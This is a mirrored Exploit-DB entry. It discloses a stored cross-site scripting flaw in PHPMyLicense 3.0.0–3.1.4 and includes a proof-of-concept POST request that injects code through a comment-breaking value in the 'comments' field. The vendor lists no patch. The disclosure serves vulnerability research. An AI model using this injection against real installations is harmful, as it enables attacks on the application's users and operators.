bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/dos/38442.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
810 B
Text
Raw Permalink Blame History

Hello, I want to report following exploit:
# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps
1.) Description:
Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.
2.) Proof of Concept:
localhost/phpmylicense/ajax/
POST:
comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing
3.) Solution:
None. - No Update available for it.
Reference in a new issue View git blame Copy permalink